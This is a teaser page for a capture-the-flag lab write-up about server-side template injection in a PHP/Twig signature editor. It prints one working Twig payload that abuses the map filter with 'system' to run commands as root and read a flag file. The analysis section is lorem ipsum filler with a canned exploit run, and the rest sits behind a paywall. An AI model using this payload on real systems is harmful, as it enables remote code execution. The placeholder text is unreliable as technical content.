Lab 130 — LearnPulse — SSTI in Signature Template Engine

hackadvisor

Task: PHP/Twig learning platform with admin Signature Template editor vulnerable to SSTI. Solution: Injected {{ [\"cat /root/flag.txt\"]|map(\"system\") }} via Twig map filter callback to achieve RCE as root.

rce php ssti nginx template_injection twig map_filter callback_injection

map_filter_callbackssti_twig_rcetwig_map_system_rcephp_array_map_callback

$ ls tags/ techniques/

rce php ssti nginx template_injection twig map_filter callback_injection

map_filter_callbackssti_twig_rcetwig_map_system_rcephp_array_map_callback

Analysis

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

$ python3 exploit.py --target 192.168.1.1 --port 8080
[*] Connecting to target...
[+] Shell obtained!

Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Permission denied (requires tier.pro)

Sign in to access full writeups

$sign in

$ grep --similar

Similar writeups

[web][Pro]MailPulse— hackadvisor
[web][Pro]Lab 225 — MailPulse — SSTI in Campaign Template Preview— hackadvisor
[web][Pro]Lab 120 — InfraPulse— hackadvisor
[web][Pro]Lab 378 — PulseBoard — Cache Poisoning XSS via Next.js Header Misclassification— hackadvisor
[web][Pro]Lab 133 — MailForge — SSTI via Handlebars Template Preview— hackadvisor